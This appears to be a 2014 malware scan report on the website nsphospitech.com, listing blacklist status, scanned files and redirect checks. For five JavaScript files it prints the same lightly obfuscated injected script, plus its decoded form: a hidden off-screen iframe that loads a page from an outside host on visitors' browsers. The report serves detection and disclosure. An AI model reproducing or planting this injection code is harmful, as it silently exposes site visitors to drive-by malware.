Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nsphospitech.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nsphospitech.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nsphospitech.com/ | 200 OK Content-Length: 59591 Content-Type: text/html | clean |
http://nsphospitech.com/jquery.js | 200 OK Content-Length: 1820 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://nsphospitech.com/js/jquery.contactable.js | 200 OK Content-Length: 1820 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://nsphospitech.com/certificate.html | 200 OK Content-Length: 37595 Content-Type: text/html | clean |
http://nsphospitech.com/js/jquery.js | 200 OK Content-Length: 1820 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://nsphospitech.com/js/jquery_002.js | 200 OK Content-Length: 1820 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://nsphospitech.com/index.html | 200 OK Content-Length: 59591 Content-Type: text/html | clean |
http://nsphospitech.com/pipeline-equipment-device.html | 200 OK Content-Length: 38193 Content-Type: text/html | clean |
http://nsphospitech.com/mgps-solutions.html | 200 OK Content-Length: 27085 Content-Type: text/html | clean |
http://nsphospitech.com/contact.html | 200 OK Content-Length: 59367 Content-Type: text/html | clean |
http://nsphospitech.com/customer-feedback.html | 200 OK Content-Length: 54934 Content-Type: text/html | clean |
http://nsphospitech.com/sitemap.html | 200 OK Content-Length: 7885 Content-Type: text/html | clean |
http://nsphospitech.com/medical-gas-pipeline-system.html | 200 OK Content-Length: 43431 Content-Type: text/html | clean |
http://nsphospitech.com/js_script/translate.js | 200 OK Content-Length: 1820 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://nsphospitech.com/medical-gas-control.html | 200 OK Content-Length: 39503 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nsphospitech.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 18 Jun 2014 17:57:06 GMT
Accept-Ranges: bytes
ETag: "f62d9f-e8c7-4d86cf3f79800"
Server: Apache
Content-Length: 59591
Content-Type: text/html; charset=UTF-8
Last-Modified: Thu, 21 Mar 2013 10:39:28 GMT
...59591 bytes of data.
GET / HTTP/1.1
Host: nsphospitech.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 18 Jun 2014 17:57:06 GMT
Accept-Ranges: bytes
ETag: "f62d9f-e8c7-4d86cf3f79800"
Server: Apache
Content-Length: 59591
Content-Type: text/html; charset=UTF-8
Last-Modified: Thu, 21 Mar 2013 10:39:28 GMT
...59591 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nsphospitech.com
Referer: http://www.google.com/search?q=nsphospitech.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nsphospitech.com
Referer: http://www.google.com/search?q=nsphospitech.com
Result:
The result is similar to the first query. There are no suspicious redirects found.